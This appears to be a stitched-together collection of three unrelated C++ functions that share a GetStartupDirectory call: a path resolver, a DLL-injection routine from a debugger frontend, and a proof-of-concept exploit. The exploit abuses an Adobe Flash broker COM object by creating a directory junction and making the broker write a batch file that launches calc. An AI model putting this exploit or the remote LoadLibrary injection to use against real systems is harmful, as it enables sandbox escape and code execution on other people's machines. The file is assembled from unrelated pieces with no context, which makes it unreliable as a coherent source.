std::string FileSystem::GetFullPath(const std::string& path)
{
std::string startup = GetStartupDirectory();
std::string p = StringHelper::Replace(path, '\\', '/');
if (p[0] == '/') {
startup = GetPathRoot(startup);
p = StringHelper::TrimStart(p, '/');
}
else if (p[1] == ':') {
return p;
}
int index;
while ((index = p.find('/')) != std::string::npos) {
std::string d = p.substr(0, index);
if (d == ".") {
}
else if (d == "..") {
if (GetPathRoot(startup) != startup) {
startup = startup.substr(0, startup.find_last_of('/'));
}
}
else {
startup = StringHelper::TrimEnd(startup, '/') + "/" + d;
}
p = p.substr(index + 1);
}
return StringHelper::TrimEnd(startup, '/') + "/" + p;
}
void DoFlashBrokerExploitJunction()
{
CLSID clsid;
HRESULT hr;
CLSIDFromString(L"{73c9dfa0-750d-11e1-b0c4-0800200c9a66}", &clsid);
IFlashBroker5* pUnk;
hr = CoCreateInstance(clsid, nullptr, CLSCTX_LOCAL_SERVER | CLSCTX_ACTIVATE_32_BIT_SERVER, IID_PPV_ARGS(&pUnk));
if (SUCCEEDED(hr))
{
DebugPrintf("Created Broker: %p\n", pUnk);
bstr_t tempDir = GetTempDir();
tempDir = tempDir + L"dummy_junction";
CreateDirectoryW(tempDir, nullptr);
FSLinks::DeleteJunctionPoint(tempDir);
bstr_t baseDir = GetStartupDirectory();
if (FSLinks::CreateJunctionPoint(tempDir, baseDir))
{
char data[] = "calc\r\n";
std::vector<unsigned char> buf;
buf.resize(strlen(data));
memcpy(&buf[0], data, buf.size());
BrokerWriteFile(pUnk, tempDir + L"\\exploit.bat", buf);
}
else
{
DebugPrintf("Failed to create junction\n");
}
RemoveDirectoryW(tempDir);
pUnk->Release();
}
else
{
DebugPrintf("Failed to create broker: %08X\n", hr);
}
}
bool DebugFrontend::InjectDll(DWORD processId, const char* dllFileName)
{
bool success = true;
// Get the absolute path to the DLL.
char fullFileName[_MAX_PATH];
if (!GetStartupDirectory(fullFileName, _MAX_PATH))
{
return false;
}
strcat(fullFileName, dllFileName);
HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, processId);
if (process == NULL)
{
return false;
}
HMODULE kernelModule = GetModuleHandle("Kernel32");
FARPROC loadLibraryProc = GetProcAddress(kernelModule, "LoadLibraryA");
// Load the DLL.
DWORD exitCode;
char* remoteFileName = RemoteStrDup(process, fullFileName);
if (!ExecuteRemoteKernelFuntion(process, "LoadLibraryA", remoteFileName, exitCode))
{
success = false;
}
HMODULE dllHandle = reinterpret_cast<HMODULE>(exitCode);
if (dllHandle == NULL)
{
success = false;
}
/*
// Unload the DLL.
// This is currently not needed since the process will automatically unload
// the DLL when it exits, however at some point in the future we may need to
// explicitly unload it so I'm leaving the code here.
if (dllHandle != NULL)
{
if (!ExecuteRemoteKernelFuntion(process, "FreeLibrary", dllHandle, exitCode))
{
success = false;
}
}
*/
if (remoteFileName != NULL)
{
VirtualFreeEx(process, remoteFileName, 0, MEM_RELEASE);
remoteFileName = NULL;
}
if (process != NULL)
{
CloseHandle(process);
}
return success;
}